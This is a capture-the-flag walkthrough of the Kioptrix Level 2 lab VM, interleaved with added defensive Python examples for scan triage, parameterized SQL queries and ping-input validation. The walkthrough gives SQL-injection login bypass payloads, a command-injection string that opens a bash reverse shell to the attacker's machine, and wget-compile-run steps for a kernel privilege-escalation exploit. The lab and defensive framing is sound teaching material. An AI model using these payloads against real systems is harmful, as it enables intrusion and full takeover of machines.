Sneaker's Stub - The Grey Stuff!

Kioptrix Level 2 Challenge

The Kioptrix Level 2 challenge was noticeably harder than Level 1. You need to understand the web application and try several different approaches before you find a vulnerability.

Requirements:

  1. VMware
  2. Kioptrix level 2 challenge
  3. Kali [strictly depends on your choice]

So let's dive in:

-> Nmap 192.168.0.1/24

So my Kioptrix machine has the IP address 192.168.0.108. Let's scan the open ports and identify the services running on them.

-> nmap -sV 192.168.0.108

-> nmap -sV -A 192.168.0.108

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-03-14 10:01 EDT
Nmap scan report for 192.168.0.108
Host is up (0.00026s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            677/udp  status
|_  100024  1            680/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2017-03-14T10:40:22+00:00; -3h22m16s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:95:15:33 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.26 ms 192.168.0.108

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.85 seconds
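Before moving on, it is worth writing down what this scan output already tells a defender about the box: SSH protocol 1, SSLv2, an expired certificate, a risky HTTP method on CUPS and MySQL listening on the network interface. The following Python snippet is an added example, not part of the original post, that parses a constructed excerpt of the scan above and turns those lines into a findings list; the excerpt, the function names and the finding wording are my own.

```python
import re
from datetime import datetime

# Constructed excerpt of the nmap -sV -A output shown above, cut down to the
# lines the checks below look at.
SCAN_OUTPUT = """\
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
| sslv2:
|   SSLv2 supported
631/tcp  open  ipp      CUPS 1.1
|_  Potentially risky methods: PUT
3306/tcp open  mysql    MySQL (unauthorized)
"""

# A port line: "<port>/<proto> <state> <service> <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_services(text):
    """Return (port, proto, state, service, version) for every port line."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            services.append((int(port), proto, state, service, version.strip()))
    return services


def triage(text, scan_date):
    """Walk the output once, attributing each NSE script line ("| ...") to the
    port line it follows, and return (port, finding) pairs that deserve a
    remediation ticket. scan_date is the scan date as an ISO string and is
    used for the certificate expiry check."""
    now = datetime.fromisoformat(scan_date)
    findings = []
    port = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port = int(m.group(1))
            if m.group(4) == "mysql":
                findings.append((port, "MySQL reachable from the network"))
            continue
        if "Server supports SSHv1" in line:
            findings.append((port, "SSH protocol 1 enabled"))
        elif "SSLv2 supported" in line:
            findings.append((port, "SSLv2 enabled"))
        elif line.startswith("|_Not valid after:"):
            expiry = datetime.fromisoformat(line.split(":", 1)[1].strip())
            if expiry < now:
                findings.append((port, f"TLS certificate expired {expiry.date()}"))
        elif "Potentially risky methods:" in line:
            methods = line.split(":", 1)[1].strip()
            findings.append((port, f"risky HTTP methods allowed: {methods}"))
    return findings


if __name__ == "__main__":
    for port, finding in triage(SCAN_OUTPUT, "2017-03-14"):
        print(f"{port:>5}  {finding}")
```

The script deliberately keys on the NSE script lines rather than on version strings, because the protocol and configuration problems (SSHv1, SSLv2, an expired certificate, PUT enabled) are the ones an administrator can fix in configuration without waiting for a package upgrade.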

The first thing I thought of after going through all this was to look for an exploitable version. CUPS 1.1 allows the PUT method and I tried to poke around it, but got nothing. Next I looked at the website running on port 80. It looks like this:

As you can see in the screenshot, I tried SQL injection on the username and password fields. In my case the '--' comment does not work in the username field, but '#' does, and the SQL injection payload:

-> 'or'a'='a

works like a charm.

username: 'or'a'='a

password: 'or'a'='a

or 

username: admin' #

password: *blank*
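To see why the 'or'a'='a payload logs you in, it helps to look at the query the login form is building and at the version that does not have the problem. The following Python snippet is an added example, not code from the original post or from the Kioptrix image; it uses an in-memory SQLite table of my own construction as a stand-in for the MySQL login table, and the function and column names are assumptions.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the login table (one admin row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return conn


def build_query_vulnerable(username, password):
    """The flawed pattern: untrusted input is pasted into the SQL text, so the
    quote characters in the input become part of the statement's structure."""
    return ("SELECT username FROM users WHERE username='" + username
            + "' AND password='" + password + "'")


def login_vulnerable(conn, username, password):
    """Authentication built on the concatenated query."""
    row = conn.execute(build_query_vulnerable(username, password)).fetchone()
    return row is not None


def login_parameterized(conn, username, password):
    """Bound parameters: the values travel separately from the SQL text, so the
    driver never parses the input as SQL syntax, whatever quotes it contains."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = make_db()
    payload = "'or'a'='a"
    # The WHERE clause becomes: username='' or 'a'='a' AND password='' or 'a'='a'
    # AND binds tighter than OR, so the trailing 'a'='a' makes it true for every row.
    print(build_query_vulnerable(payload, payload))
    print("vulnerable login:    ", login_vulnerable(conn, payload, payload))
    print("parameterized login: ", login_parameterized(conn, payload, payload))
    print("real credentials:    ", login_parameterized(conn, "admin", "constructed-secret"))
```

The admin' # variant from the post is MySQL-specific: '#' starts a comment in MySQL but not in SQLite, which is why only the 'or'a'='a payload is exercised here. The fix is the same in either database: pass user input as a bound parameter and never build the statement with string concatenation.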

 

-> Try pinging some IP and look at the response. This is where command injection occurs: the PHP ping script hands the input to the OS shell, so we can append OS commands to the input in a stacked manner and see their output. && and ; let us stack commands; | is the pipe and is used to feed the output of one command into the input of another, but it is not needed for now.

 

-> We can try out commands such as:

whoami

uname

hostname

cat /etc/passwd

lsb_release

uname -r
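The ping form is vulnerable because the field value is spliced into a shell command line, so the shell honours && and ; inside it. The following Python snippet is an added example, not the Kioptrix application's code, that shows the flawed string-building side by side with a hardened handler: a strict allow-list (the field must parse as a single IP address) plus an argument vector executed without a shell. The function names and the rejection message are assumptions of mine.

```python
import ipaddress
import subprocess


def build_shell_command_vulnerable(target):
    """The flawed pattern: the form field is concatenated into a shell command
    line, so operators in the field (&&, ;, |) are interpreted by the shell."""
    return "ping -c 1 " + target


def validate_target(target):
    """Allow-list check: the field must parse as exactly one IP address.
    Shell operators, hostnames and extra words all fail ip_address() and are
    rejected before anything is executed."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        raise ValueError(f"rejected ping target: {target!r}") from None


def build_argv_safe(target):
    """Argument vector for subprocess without a shell: even if the allow-list
    were loosened later, the target reaches ping as one literal argument
    rather than as shell syntax."""
    return ["ping", "-c", "1", validate_target(target)]


def run_ping(target, timeout=5):
    """Execute the hardened form of the ping; shell=False is the default."""
    return subprocess.run(build_argv_safe(target), capture_output=True,
                          text=True, timeout=timeout)


def is_injection_attempt(target):
    """True when the submitted field would have been rejected; a web handler
    can log these with the client address to spot probing of the form."""
    try:
        validate_target(target)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # Constructed inputs: the stacked command from the post and a clean one.
    for field in ["192.168.0.1 && whoami", "192.168.0.1"]:
        print("shell string:", build_shell_command_vulnerable(field))
        print("rejected?   ", is_injection_attempt(field))
```

The validation and the shell-free argv are two independent layers: the allow-list stops the stacked command from ever being run, and subprocess with a list (no shell) means there is no shell to interpret && even if a looser validator let an operator through.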

-> For now, let's open an interactive bash shell and connect it back to our machine for a better view. Before entering the following command in the ping input box, start a listener on your machine on any port [in my case it's 4444]:

-> Listen on Kali:

-> 192.168.0.1 && bash -i >& /dev/tcp/192.168.0.106/4444 0>&1

192.168.0.106 is my Kali machine, and netcat is listening on it.

Once you submit this, the page that opens stays busy, and netcat will show that we have received the bash shell.

This command shell is no different from the one we have been using through the web page, but it gives a better view. If you run whoami, the response is apache, which means we are not root and are limited to what the apache user can do. To get past this we need a vulnerability, either inside the system or through one of the open ports, to escalate our privileges. After looking around a bit, I checked the kernel version.

A little search on kernel 2.6.9 will give you an exploit:

Let's download this exploit. We are not allowed to write to any directory other than /tmp, so let's download the exploit into /tmp/ and run it from there.

-> wget -O /tmp/shell.c https://www.exploit-db.com/download/9542 --no-check-certificate

-> To compile the file: gcc /tmp/shell.c -o /tmp/run

-> /tmp/run

After running the exploit we have root access, which we can confirm by typing whoami.

I changed the root password, so now I can log in to Kioptrix and make whatever changes I want.

That's how I got root access on the Kioptrix Level 2 challenge.
